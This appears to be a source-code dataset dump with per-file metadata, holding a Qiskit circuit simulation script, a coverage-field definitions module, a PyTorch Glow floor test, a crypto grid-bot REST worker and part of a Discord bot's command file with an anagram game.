    prog.cz(input_qubit[0],input_qubit[3]) # number=37
    prog.h(input_qubit[3]) # number=38
    prog.h(input_qubit[3]) # number=23
    prog.cz(input_qubit[0],input_qubit[3]) # number=24
    prog.h(input_qubit[3]) # number=25
    prog.x(input_qubit[3]) # number=18
    prog.cx(input_qubit[0],input_qubit[3]) # number=19
    prog.cx(input_qubit[0],input_qubit[3]) # number=15
    prog.h(input_qubit[1]) # number=2
    prog.h(input_qubit[2]) # number=3
    prog.h(input_qubit[3]) # number=4
    prog.y(input_qubit[3]) # number=12
    prog.h(input_qubit[0]) # number=5
    # Oracle over the first n-1 qubits, with qubit n-1 as its target.
    oracle = build_oracle(n-1, f)
    prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
    prog.h(input_qubit[1]) # number=6
    prog.h(input_qubit[2]) # number=7
    prog.h(input_qubit[3]) # number=32
    prog.cx(input_qubit[3],input_qubit[0]) # number=20
    prog.cx(input_qubit[3],input_qubit[0]) # number=26
    prog.z(input_qubit[3]) # number=27
    prog.h(input_qubit[0]) # number=29
    prog.cz(input_qubit[3],input_qubit[0]) # number=30
    prog.h(input_qubit[0]) # number=31
    prog.h(input_qubit[0]) # number=33
    prog.cz(input_qubit[3],input_qubit[0]) # number=34
    prog.h(input_qubit[0]) # number=35
    prog.h(input_qubit[3]) # number=8
    prog.h(input_qubit[0]) # number=9
    prog.y(input_qubit[2]) # number=10
    prog.y(input_qubit[2]) # number=11
    # circuit end
    return prog
if __name__ == '__main__':
    # Hidden bit strings defining the benchmark function f(rep) = (a.rep) xor b.
    a = "111"
    b = "0"
    f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
    prog = make_circuit(4,f)
    # Exact simulation: obtain the final statevector of the circuit.
    backend = BasicAer.get_backend('statevector_simulator')
    sample_shot =8000  # NOTE(review): unused with the statevector backend
    info = execute(prog, backend=backend).result().get_statevector()
    qubits = round(log2(len(info)))
    # Convert amplitudes to basis-state probabilities, rounded to 3 decimals.
    info = {
        np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
        for i in range(2 ** qubits)
    }
    # Transpile against a mock device to record the compiled circuit and size.
    backend = FakeVigo()
    circuit1 = transpile(prog,backend,optimization_level=2)
    writefile = open("../data/startQiskit_Class2285.csv","w")
    print(info,file=writefile)
    print("results end", file=writefile)
    print(circuit1.__len__(),file=writefile)
    print(circuit1,file=writefile)
    writefile.close()
| 34.264463 | 140 | 0.646165 |
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3])
prog.cz(input_qubit[0],input_qubit[3])
prog.h(input_qubit[3])
prog.h(input_qubit[3])
prog.cz(input_qubit[0],input_qubit[3])
prog.h(input_qubit[3])
prog.x(input_qubit[3])
prog.cx(input_qubit[0],input_qubit[3])
prog.cx(input_qubit[0],input_qubit[3])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.y(input_qubit[3])
prog.h(input_qubit[0])
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.cx(input_qubit[3],input_qubit[0])
prog.cx(input_qubit[3],input_qubit[0])
prog.z(input_qubit[3])
prog.h(input_qubit[0])
prog.cz(input_qubit[3],input_qubit[0])
prog.h(input_qubit[0])
prog.h(input_qubit[0])
prog.cz(input_qubit[3],input_qubit[0])
prog.h(input_qubit[0])
prog.h(input_qubit[3])
prog.h(input_qubit[0])
prog.y(input_qubit[2])
prog.y(input_qubit[2])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = BasicAer.get_backend('statevector_simulator')
sample_shot =8000
info = execute(prog, backend=backend).result().get_statevector()
qubits = round(log2(len(info)))
info = {
np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
for i in range(2 ** qubits)
}
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_Class2285.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| true | true |
f722f68671210fad50d8f791d2f07c23952265c7 | 3,483 | py | Python | coveragecalc/fields.py | myu-wp/coveragecalc | e2fac3baba3f240c8d776f7d28331899333a05c2 | [
"MIT"
] | null | null | null | coveragecalc/fields.py | myu-wp/coveragecalc | e2fac3baba3f240c8d776f7d28331899333a05c2 | [
"MIT"
] | 2 | 2017-12-01T22:28:15.000Z | 2017-12-11T17:10:31.000Z | coveragecalc/fields.py | myu-wp/coveragecalc | e2fac3baba3f240c8d776f7d28331899333a05c2 | [
"MIT"
] | null | null | null | import numpy as np
# Names of the output fields of the coverage report; fields ending in
# "binned" correspond to the numeric fields bucketed via BINS.
OUTPUTS = [
    'primary phone is valid',
    'primary phone to name',
    'primary phone to address',
    'primary phone line type',
    'primary phone is prepaid',
    'primary phone is commercial',
    'primary address is valid',
    'primary address diagnostic',
    'primary address to name',
    'primary address type',
    'primary address is active',
    'primary address is commercial',
    'primary address is forwarder',
    'secondary phone is valid',
    'secondary phone to name',
    'secondary phone to address',
    'secondary phone line type',
    'secondary phone is prepaid',
    'secondary phone is commercial',
    'secondary address is valid',
    'secondary address diagnostic',
    'secondary address to name',
    'secondary address type',
    'secondary address is active',
    'secondary address is commercial',
    'secondary address is forwarder',
    'email is valid',
    'email is disposable',
    'email is auto-generated',
    'email to name',
    'email first seen days binned',
    'ip is valid',
    'ip distance from address binned',
    'ip distance from phone binned',
    'ip is proxy',
    'ip connection type',
    'confidence score binned',
]
# Binning specs for numeric fields: `bins` are the bucket edges (upper edge
# open-ended via np.inf where applicable) and `labels` name the resulting
# intervals; each spec has one more edge than labels.
BINS = {
    'email first seen days': {
        'labels': ['Never', '< 3 months', '3 months to a year', '1-4 years', '5+ years'],
        'bins': [0, 1, 180, 365, 1825, np.inf],
    },
    'ip distance from address': {
        'labels': ['0-9', '10-99', '100-999', '1000+'],
        'bins': [0, 10, 100, 1000, np.inf],
    },
    'ip distance from phone': {
        'labels': ['0-9', '10-99', '100-999', '1000+'],
        'bins': [0, 10, 100, 1000, np.inf],
    },
    'confidence score': {
        # 20 buckets of width 25 covering scores 0-500.
        'bins': np.arange(0,525,25),
        'labels': ['0-25', '25-50', '50-75', '75-100', '100-125', '125-150',
                   '150-175', '175-200', '200-225', '225-250', '250-275',
                   '275-300', '300-325', '325-350', '350-375', '375-400',
                   '400-425', '425-450', '450-475', '475-500',],
    },
}
# Possible values of the *-to-name match fields.
to_name = [
    'Match',
    'No match',
    'No name found',
]
# Possible values of the phone-to-address match fields.
to_address = [
    'Match',
    'Zip+4 match',
    'Postal match',
    'City/State match',
    'No match',
]
# Phone line-type classifications.
line_type = [
    'Mobile',
    'Landline',
    'Fixed VOIP',
    'Non-fixed VOIP',
    'Premium',
    'Tollfree',
    'Voicemail',
    'Other',
    'Unknown',
]
# Address classifications.
address_type = [
    'Commercial mail drop',
    'Multi unit',
    'Single unit',
    'PO box',
    'PO box throwback',
    'Unknown address type',
]
# Address validation diagnostic outcomes.
address_diagnostic = [
    'Validated',
    'Validated with corrections',
    'Validated only Street, Postcode, City, Country. Premise not validated',
    'Validated only Postcode, City, Country',
    'Validated only City, Country',
    'Validated only Country',
]
# Maps each categorical output field to the list of its allowed values.
CATEGORIES = {
    'primary phone to name': to_name,
    'secondary phone to name': to_name,
    'primary address to name': to_name,
    'secondary address to name': to_name,
    'email to name': to_name,
    'primary phone to address': to_address,
    'secondary phone to address': to_address,
    'primary phone line type': line_type,
    'secondary phone line type': line_type,
    'primary address type': address_type,
    'secondary address type': address_type,
    'primary address diagnostic': address_diagnostic,
    'secondary address diagnostic': address_diagnostic,
    'ip connection type': [
        'Cable/DSL',
        'Corporate',
        'Cellular',
        'Dialup',
    ],
} | 27.864 | 89 | 0.588286 | import numpy as np
OUTPUTS = [
'primary phone is valid',
'primary phone to name',
'primary phone to address',
'primary phone line type',
'primary phone is prepaid',
'primary phone is commercial',
'primary address is valid',
'primary address diagnostic',
'primary address to name',
'primary address type',
'primary address is active',
'primary address is commercial',
'primary address is forwarder',
'secondary phone is valid',
'secondary phone to name',
'secondary phone to address',
'secondary phone line type',
'secondary phone is prepaid',
'secondary phone is commercial',
'secondary address is valid',
'secondary address diagnostic',
'secondary address to name',
'secondary address type',
'secondary address is active',
'secondary address is commercial',
'secondary address is forwarder',
'email is valid',
'email is disposable',
'email is auto-generated',
'email to name',
'email first seen days binned',
'ip is valid',
'ip distance from address binned',
'ip distance from phone binned',
'ip is proxy',
'ip connection type',
'confidence score binned',
]
BINS = {
'email first seen days': {
'labels': ['Never', '< 3 months', '3 months to a year', '1-4 years', '5+ years'],
'bins': [0, 1, 180, 365, 1825, np.inf],
},
'ip distance from address': {
'labels': ['0-9', '10-99', '100-999', '1000+'],
'bins': [0, 10, 100, 1000, np.inf],
},
'ip distance from phone': {
'labels': ['0-9', '10-99', '100-999', '1000+'],
'bins': [0, 10, 100, 1000, np.inf],
},
'confidence score': {
'bins': np.arange(0,525,25),
'labels': ['0-25', '25-50', '50-75', '75-100', '100-125', '125-150',
'150-175', '175-200', '200-225', '225-250', '250-275',
'275-300', '300-325', '325-350', '350-375', '375-400',
'400-425', '425-450', '450-475', '475-500',],
},
}
to_name = [
'Match',
'No match',
'No name found',
]
to_address = [
'Match',
'Zip+4 match',
'Postal match',
'City/State match',
'No match',
]
line_type = [
'Mobile',
'Landline',
'Fixed VOIP',
'Non-fixed VOIP',
'Premium',
'Tollfree',
'Voicemail',
'Other',
'Unknown',
]
address_type = [
'Commercial mail drop',
'Multi unit',
'Single unit',
'PO box',
'PO box throwback',
'Unknown address type',
]
address_diagnostic = [
'Validated',
'Validated with corrections',
'Validated only Street, Postcode, City, Country. Premise not validated',
'Validated only Postcode, City, Country',
'Validated only City, Country',
'Validated only Country',
]
CATEGORIES = {
'primary phone to name': to_name,
'secondary phone to name': to_name,
'primary address to name': to_name,
'secondary address to name': to_name,
'email to name': to_name,
'primary phone to address': to_address,
'secondary phone to address': to_address,
'primary phone line type': line_type,
'secondary phone line type': line_type,
'primary address type': address_type,
'secondary address type': address_type,
'primary address diagnostic': address_diagnostic,
'secondary address diagnostic': address_diagnostic,
'ip connection type': [
'Cable/DSL',
'Corporate',
'Cellular',
'Dialup',
],
} | true | true |
f722f728e24b6a6184391e65e7e980e2d7ffd119 | 566 | py | Python | torch_glow/tests/nodes/floor_test.py | aksingh-fb/glow | c50603a1885c9bffd935fbd1c7c10766b062cef9 | [
"Apache-2.0"
] | 1 | 2021-04-10T09:05:08.000Z | 2021-04-10T09:05:08.000Z | torch_glow/tests/nodes/floor_test.py | aksingh-fb/glow | c50603a1885c9bffd935fbd1c7c10766b062cef9 | [
"Apache-2.0"
] | null | null | null | torch_glow/tests/nodes/floor_test.py | aksingh-fb/glow | c50603a1885c9bffd935fbd1c7c10766b062cef9 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from tests import utils
class SimpleFloorModule(torch.nn.Module):
    """Module that adds its two inputs and applies an elementwise floor."""

    def forward(self, a, b):
        summed = torch.add(a, b)
        return summed.floor()
class TestFloor(unittest.TestCase):
    def test_floor(self):
        """Basic test of the PyTorch floor Node on Glow."""
        lhs = torch.randn(3, 4, 5)
        rhs = torch.randn(3, 4, 5)
        utils.compare_tracing_methods(
            SimpleFloorModule(),
            lhs,
            rhs,
            fusible_ops={"aten::floor"},
        )
| 23.583333 | 82 | 0.64841 | from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from tests import utils
class SimpleFloorModule(torch.nn.Module):
def forward(self, a, b):
c = a + b
return torch.floor(c)
class TestFloor(unittest.TestCase):
def test_floor(self):
x = torch.randn(3, 4, 5)
y = torch.randn(3, 4, 5)
utils.compare_tracing_methods(
SimpleFloorModule(), x, y, fusible_ops={"aten::floor"}
)
| true | true |
f722f91702759297291a44f2edab97ddb2be4884 | 3,957 | py | Python | src/rest.py | thibaultyou/grid-bot | 9c360c00ec3e87eb639fb5e2ee755d2dec77bcc9 | [
"MIT"
] | 4 | 2022-03-06T03:51:03.000Z | 2022-03-08T14:19:31.000Z | src/rest.py | thibaultyou/grid-bot | 9c360c00ec3e87eb639fb5e2ee755d2dec77bcc9 | [
"MIT"
] | null | null | null | src/rest.py | thibaultyou/grid-bot | 9c360c00ec3e87eb639fb5e2ee755d2dec77bcc9 | [
"MIT"
] | null | null | null | import logging
import time
from threading import Thread
from src.events import CREATE_LIMIT_ORDER, CREATE_MARKET_ORDER, GRID_INIT, GRID_RESET, ORDERS, POSITION, REMOVE_ALL_LIMIT_ORDERS, REMOVE_LIMIT_ORDER, REMOVE_MARKET_ORDER
from src.sessions import SESSIONS, get_session
class RestWorker:
    """Background worker that drains queued REST commands from `executions`
    and appends the results onto the shared `events` queue."""

    def start(self, executions, events):
        """Launch the polling loop on a background thread.

        executions: deque of pending REST commands (tuples keyed by event type).
        events: deque the rest of the application consumes for results.
        """
        t = Thread(target=self._run, args=(executions, events))
        t.start()
    # TODO improve
    def _run(self, executions, events):
        """Poll `executions` forever, dispatching each command to the REST API."""
        while True:
            if (len(executions)):
                # print(executions)
                ex = executions.popleft()
                try:
                    if (len(ex) == 2 and ex[0] == ORDERS):
                        # Fetch open orders for market ex[1].
                        orders = get_session().fetchOpenOrders(ex[1])
                        events.append((ORDERS, orders))
                    elif (len(ex) == 2 and ex[0] == POSITION):
                        # Report the position matching market ex[1], if any.
                        positions = get_session().fetchPositions()
                        for position in positions:
                            if ('info' in position and 'future' in position['info'] and position['info']['future'] == ex[1]):
                                events.append((POSITION, position['info']))
                        if (len(positions) == 0):
                            events.append((POSITION, None))
                    elif (len(ex) == 4 and ex[0] == CREATE_MARKET_ORDER):
                        # ex = (type, symbol, side, amount)
                        order = get_session().createOrder(
                            ex[1], 'market', ex[2], ex[3])
                        events.append((CREATE_MARKET_ORDER, order))
                    elif (len(ex) == 5 and ex[0] == CREATE_LIMIT_ORDER):
                        # ex = (type, symbol, side, amount, price)
                        order = get_session().createOrder(
                            ex[1], 'limit', ex[2], ex[3], ex[4])
                        events.append((CREATE_LIMIT_ORDER, order))
                    elif (len(ex) == 2 and (ex[0] == GRID_INIT or ex[0] == GRID_RESET)):
                        # Gather the current position and ticker for market ex[1].
                        positions = get_session().fetchPositions()
                        position = None
                        # TODO improve
                        for p in positions:
                            if ('info' in p and 'future' in p['info'] and p['info']['future'] == ex[1]):
                                position = p['info']
                        # Throttle between the two REST calls (rate limit shared across sessions).
                        time.sleep(0.25 / len(SESSIONS))
                        ticker = get_session().fetchTicker(ex[1])
                        if (ex[0] == GRID_RESET):
                            events.append((GRID_INIT, ticker, position, True))
                        else:
                            events.append((GRID_INIT, ticker, position))
                    elif (len(ex) == 2 and ex[0] == REMOVE_MARKET_ORDER):
                        # Close any open position on ex[1] with an opposite market order.
                        positions = get_session().fetchPositions()
                        for position in positions:
                            if ('info' in position and 'side' in position['info'] and 'size' in position['info'] and 'future' in position['info'] and position['info']['future'] == ex[1]):
                                side = 'buy' if position['info']['side'] == 'sell' else 'sell'
                                get_session().createOrder(
                                    ex[1], 'market', side, position['info']['size'])
                        events.append((REMOVE_MARKET_ORDER))  # NOTE(review): parens do not make a tuple; this appends the bare constant, unlike the tuple events above -- confirm consumers expect that
                    elif (len(ex) == 2 and ex[0] == REMOVE_LIMIT_ORDER):
                        get_session().cancelOrder(ex[1])
                        events.append((REMOVE_LIMIT_ORDER))  # NOTE(review): bare constant, not a 1-tuple
                    elif (len(ex) == 2 and ex[0] == REMOVE_ALL_LIMIT_ORDERS):
                        get_session().cancelAllOrders(ex[1])
                        events.append((REMOVE_ALL_LIMIT_ORDERS))  # NOTE(review): bare constant, not a 1-tuple
                    time.sleep(0.25 / len(SESSIONS))
                except Exception as e:
                    logging.error(f'FtxRestWorker exception: {e}')
time.sleep(0.05) | 57.347826 | 188 | 0.468789 | import logging
import time
from threading import Thread
from src.events import CREATE_LIMIT_ORDER, CREATE_MARKET_ORDER, GRID_INIT, GRID_RESET, ORDERS, POSITION, REMOVE_ALL_LIMIT_ORDERS, REMOVE_LIMIT_ORDER, REMOVE_MARKET_ORDER
from src.sessions import SESSIONS, get_session
class RestWorker:
def start(self, executions, events):
t = Thread(target=self._run, args=(executions, events))
t.start()
def _run(self, executions, events):
while True:
if (len(executions)):
ex = executions.popleft()
try:
if (len(ex) == 2 and ex[0] == ORDERS):
orders = get_session().fetchOpenOrders(ex[1])
events.append((ORDERS, orders))
elif (len(ex) == 2 and ex[0] == POSITION):
positions = get_session().fetchPositions()
for position in positions:
if ('info' in position and 'future' in position['info'] and position['info']['future'] == ex[1]):
events.append((POSITION, position['info']))
if (len(positions) == 0):
events.append((POSITION, None))
elif (len(ex) == 4 and ex[0] == CREATE_MARKET_ORDER):
order = get_session().createOrder(
ex[1], 'market', ex[2], ex[3])
events.append((CREATE_MARKET_ORDER, order))
elif (len(ex) == 5 and ex[0] == CREATE_LIMIT_ORDER):
order = get_session().createOrder(
ex[1], 'limit', ex[2], ex[3], ex[4])
events.append((CREATE_LIMIT_ORDER, order))
elif (len(ex) == 2 and (ex[0] == GRID_INIT or ex[0] == GRID_RESET)):
positions = get_session().fetchPositions()
position = None
for p in positions:
if ('info' in p and 'future' in p['info'] and p['info']['future'] == ex[1]):
position = p['info']
time.sleep(0.25 / len(SESSIONS))
ticker = get_session().fetchTicker(ex[1])
if (ex[0] == GRID_RESET):
events.append((GRID_INIT, ticker, position, True))
else:
events.append((GRID_INIT, ticker, position))
elif (len(ex) == 2 and ex[0] == REMOVE_MARKET_ORDER):
positions = get_session().fetchPositions()
for position in positions:
if ('info' in position and 'side' in position['info'] and 'size' in position['info'] and 'future' in position['info'] and position['info']['future'] == ex[1]):
side = 'buy' if position['info']['side'] == 'sell' else 'sell'
get_session().createOrder(
ex[1], 'market', side, position['info']['size'])
events.append((REMOVE_MARKET_ORDER))
elif (len(ex) == 2 and ex[0] == REMOVE_LIMIT_ORDER):
get_session().cancelOrder(ex[1])
events.append((REMOVE_LIMIT_ORDER))
elif (len(ex) == 2 and ex[0] == REMOVE_ALL_LIMIT_ORDERS):
get_session().cancelAllOrders(ex[1])
events.append((REMOVE_ALL_LIMIT_ORDERS))
time.sleep(0.25 / len(SESSIONS))
except Exception as e:
logging.error(f'FtxRestWorker exception: {e}')
time.sleep(0.05) | true | true |
f722f9d0617429fd42b883604d1c256fe2b1edf7 | 52,903 | py | Python | src/commands.py | hyper-neutrino/bots-reforged | cbb4d34f2e40d460301077c8d58d3619e71f4406 | [
"MIT"
] | null | null | null | src/commands.py | hyper-neutrino/bots-reforged | cbb4d34f2e40d460301077c8d58d3619e71f4406 | [
"MIT"
] | null | null | null | src/commands.py | hyper-neutrino/bots-reforged | cbb4d34f2e40d460301077c8d58d3619e71f4406 | [
"MIT"
] | null | null | null | import asyncio, datetime, discord, json, pycountry, random, re, requests, time, traceback
from aioconsole import ainput
from word2number import w2n
from client import *
from datamanager import config, del_data, get_data, has_data, mod_data, set_data, batch_set_data
from discordutils import *
from league import *
async def dm(user, *a, **k):
    """Send a direct message to `user`, lazily creating the DM channel if needed."""
    target = user.dm_channel or await user.create_dm()
    await target.send(*a, **k)
@client.command("", ["help"], "", "")
@client.command("General Commands", ["help", "rpg"], "help [rpg]", "post a list of commands")
async def command_help(command, message):
    """DM the caller a categorized command list; `help rpg` shows only RPG commands."""
    rpg_only = len(command) == 3
    grouped = {}
    for section, _, syntax, description, _ in client.commands:
        # Entries with an empty section are hidden; RPG entries appear only
        # for `help rpg`, and all other sections only for plain `help`.
        if section == "" or ((section == "RPG Commands") ^ rpg_only):
            continue
        grouped.setdefault(section, []).append(f"`{syntax}` - {description}")
    embed = discord.Embed(
        title = "Help - Commands",
        color = client.color
    )
    for section, entries in grouped.items():
        embed.add_field(name = section, value = "\n".join(entries), inline = False)
    await dm(message.author, embed = embed)
    await send(message, "Sent the command list to your DMs!")
@client.command("General Commands", ["ping"], "ping", "check your ping")
async def command_ping(command, message):
    """Reply with the round-trip latency derived from the message's creation timestamp."""
    sent_at = (message.created_at - datetime.datetime(1970, 1, 1)) / datetime.timedelta(seconds = 1)
    ping = int((time.time() - sent_at) * 1000)
    await send(message, f"Pong! ({ping} ms)", reaction = "🏓")
@client.command("Channel Type Commands", ["subscribe"], "subscribe", "announce updates to this channel")
async def command_subscribe(command, message):
    """Add this channel to the set that receives status announcements."""
    channel_id = message.channel.id
    await mod_data("announcement_channels", lambda channels: channels | {channel_id}, default = set())
    await send(message, "Subscribed to status updates here!")
@client.command("Channel Type Commands", ["unsubscribe"], "unsubscribe", "stop announcing updates to this channel")
async def command_unsubscribe(command, message):
    """Remove this channel from the set that receives status announcements."""
    channel_id = message.channel.id
    await mod_data("announcement_channels", lambda channels: channels - {channel_id}, default = set())
    await send(message, "Unsubscribed from status updates here!")
@client.command("Channel Type Commands", ["watch", ("osu", "genshin")], "watch osu/genshin", "watch osu!/Genshin Impact updates here")
async def command_watch(command, message):
    """Register this channel for osu!/Genshin Impact update notifications."""
    display_names = {"osu": "osu!", "genshin": "Genshin Impact"}
    await mod_data("watch_channels", command[2], lambda channels: channels | {message.channel.id}, default = set())
    await send(message, "Now watching " + display_names[command[2]] + " updates in this channel!")
@client.command("Channel Type Commands", ["unwatch", ("osu", "genshin")], "unwatch osu/genshin", "stop watching osu!/Genshin Impact updates here")
async def command_unwatch(command, message):
    """Unregister this channel from osu!/Genshin Impact update notifications.

    Fix: this handler was also named `command_watch`, shadowing the watch
    handler above at module level. Registration happens at decoration time so
    bot behavior was unaffected, but the rename removes the silent shadowing.
    """
    await mod_data("watch_channels", command[2], lambda x: x - {message.channel.id}, default = set())
    await send(message, "No longer watching " + {"osu": "osu!", "genshin": "Genshin Impact"}[command[2]] + " updates in this channel!")
# Dictionary for the anagram game: all words of length >= 5, plus an index
# keyed by each word's sorted letters so every valid answer to a scramble
# can be looked up in one step.
words = None
wordmap = {}
with open("data/words.txt") as f:
    words = [line for line in f.read().strip().splitlines() if len(line) >= 5]
for word in words:
    wordmap.setdefault("".join(sorted(word)), set()).add(word)

# Serializes all reads/writes of per-channel anagram puzzle state.
anagram_lock = asyncio.Lock()
def display(actual, scrambled, hint):
    """Render the scrambled puzzle with the first and last `hint` letters of the answer revealed in bold.

    The revealed letters come from `actual` and are removed from the scrambled
    middle so no character appears twice; `hint == 0` returns the scramble as-is.
    """
    if hint == 0:
        return scrambled
    # If 2 * hint exceeds the word length the prefix and suffix would overlap,
    # so shrink the prefix to whatever the suffix does not already cover.
    prefix = actual[:hint] if hint * 2 <= len(actual) else actual[:-hint]
    suffix = actual[-hint:]
    middle = list(scrambled)
    for ch in prefix + suffix:
        middle.remove(ch)
    return f"**{prefix}**{''.join(middle)}**{suffix}**"
async def anagram_function(message, answer = None, start = False, stop = False, hint = False, reorder = False):
    """Central state machine for the per-channel anagram game.

    All flags may combine in one call: `reorder` reshuffles the current
    scramble, `hint` reveals two more letters (or ends the puzzle if too few
    would remain hidden), `stop` ends the puzzle, `answer` checks a guess,
    and `start` begins a new puzzle. All state access is guarded by
    `anagram_lock` so concurrent messages cannot corrupt a channel's puzzle.
    """
    global words, wordmap
    async with anagram_lock:
        # Load current channel state without creating missing keys.
        active = await has_data("anagram", message.channel.id, "puzzle")
        puzzle = await get_data("anagram", message.channel.id, "puzzle", default = "", set_if_missing = False)
        # Every dictionary word with the same letters is an accepted answer.
        answers = wordmap.get("".join(sorted(puzzle)), set())
        current_hint = await get_data("anagram", message.channel.id, "hint", default = 0, set_if_missing = False)
        if reorder:
            if active:
                charlist = list(puzzle)
                random.shuffle(charlist)
                puzzle = "".join(charlist)
                await set_data("anagram", message.channel.id, "puzzle", puzzle)
                await send(message, f"Reordered: solve for '{display(sorted(answers)[0], puzzle, current_hint)}' ({len(puzzle)}).")
            else:
                await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
        if hint:
            if active:
                # Each hint reveals 2 letters; if revealing more would leave
                # <= 1 letter hidden, end the puzzle instead.
                if len(puzzle) - current_hint * 2 - 2 <= 1:
                    stop = True
                else:
                    await set_data("anagram", message.channel.id, "hint", current_hint + 1)
                    await send(message, f"Hint: 2 more letters shown: solve for '{display(sorted(answers)[0], puzzle, current_hint + 1)}' ({len(puzzle)}).")
            else:
                await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
        if stop:
            if active:
                if len(answers) == 1:
                    await send(message, f"Anagram puzzle ended! The correct answer was '{list(answers)[0]}'.")
                else:
                    await send(message, f"Anagram puzzle ended! The correct answers were {english_list(quote(answers))}.")
                await del_data("anagram", message.channel.id)
                active = False
            else:
                await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
        if active and answer in answers:
            try:
                # Score: word length minus 2 per hint used, plus a speed bonus
                # (half the points) when solved within 5 seconds of posting.
                points = len(answer) - 2 * await get_data("anagram", message.channel.id, "hint")
                bonus = int(points / 2) * (time.time() - await get_data("anagram", message.channel.id, "timestamp", default = 0) <= 5)
                await mod_data("leaderboard", "anagram", message.author.id, lambda x: x + points + bonus, default = 0)
                # Remember the just-solved answers briefly (see the `elif`
                # below, which taunts people who answer a hair too late).
                await batch_set_data("anagram", message.channel.id, active = False, last = answers, lasttime = time.time())
                active = False
                bonus_display = f" **+{bonus}**" if bonus else ""
                alt_display = f" (Alternative answers: {english_list(quote(answers - {answer}))})" if len(answers) > 1 else ""
                await send(message, f"Congratulations to {message.author.mention} for winning the anagram puzzle! (+{points}{bonus_display}){alt_display}", allowed_mentions = discord.AllowedMentions.none())
                start = True
            except:
                print(traceback.format_exc())
        elif answer in await get_data("anagram", message.channel.id, "last", default = set()) and time.time() - await get_data("anagram", message.channel.id, "lasttime", default = 0) <= 1:
            # Correct answer, but within 1 second after someone else won.
            await send(message, f"{message.author.mention} L", reaction = "x", allowed_mentions = discord.AllowedMentions.none())
        if start:
            if active:
                hint = await get_data("anagram", message.channel.id, "hint", default = 0)
                actual = sorted(answers)[0]
                await send(message, f"An anagram puzzle is already running! Solve for '{display(actual, puzzle, hint)}' ({len(puzzle)}).", reaction = "x")
            else:
                # Pick a fresh word and post its scramble.
                word = random.choice(words)
                charlist = list(word)
                random.shuffle(charlist)
                scrambled = "".join(charlist)
                await batch_set_data("anagram", message.channel.id, active = True, puzzle = scrambled, hint = 0, timestamp = time.time())
                await send(message, f"Anagram puzzle! Solve for '{scrambled}' ({len(word)}).")
@client.command("Anagram Commands", ["anagram"], "anagram start", "start an anagram puzzle")
async def command_anagram_start(command, message):
    # Thin wrapper: begin a new puzzle in this channel.
    await anagram_function(message, start = True)
@client.command("Anagram Commands", ["anagram", "restart"], "anagram restart", "restart the anagram puzzle")
async def command_anagram_restart(command, message):
    # Thin wrapper: end the current puzzle (revealing the answer) and start a new one.
    await anagram_function(message, stop = True, start = True)
@client.command("Anagram Commands", ["anagram", "stop"], "anagram stop", "stop the anagram puzzle")
async def command_anagram_stop(command, message):
    # Thin wrapper: end the current puzzle and reveal the answer(s).
    await anagram_function(message, stop = True)
@client.command("Anagram Commands", ["anagram", "shuffle"], "anagram shuffle", "alias for `anagram reorder`")
@client.command("Anagram Commands", ["anagram", "scramble"], "anagram scramble", "alias for `anagram reorder`")
@client.command("Anagram Commands", ["anagram", "reorder"], "anagram reorder", "reorder the anagram puzzle")
async def command_anagram_reorder(command, message):
    # Thin wrapper: reshuffle the current scramble without changing the answer.
    await anagram_function(message, reorder = True)
@client.command("Anagram Commands", ["anagram", "hint"], "anagram hint", "show another character in the anagram puzzle")
async def command_anagram_hint(command, message):
    # Thin wrapper: reveal two more letters (may end the puzzle if too few remain).
    await anagram_function(message, hint = True)
@client.command("Anagram Commands", ["anagram", "add", "?"], "anagram add <word>", "add a word to the anagram dictionary")
async def command_anagram_add(command, message):
    """Add a word to the on-disk anagram dictionary and the in-memory index.

    Fix: the `all(...)` letters check passes vacuously for an empty string,
    so a blank argument could be written into the dictionary; empty words are
    now rejected explicitly.
    """
    global words, wordmap
    word = command[3].strip().lower()
    if word and all(char in "abcdefghijklmnopqrstuvwxyz" for char in word):
        if word in words:
            await send(message, "This word is already in the dictionary!", reaction = "x")
        else:
            words.append(word)
            words.sort()
            # Persist the full sorted dictionary so the word survives restarts.
            with open("data/words.txt", "w") as f:
                f.write("\n".join(words))
            # Index by sorted letters so anagram lookups can find the new word.
            key = "".join(sorted(word))
            if key not in wordmap:
                wordmap[key] = set()
            wordmap[key].add(word)
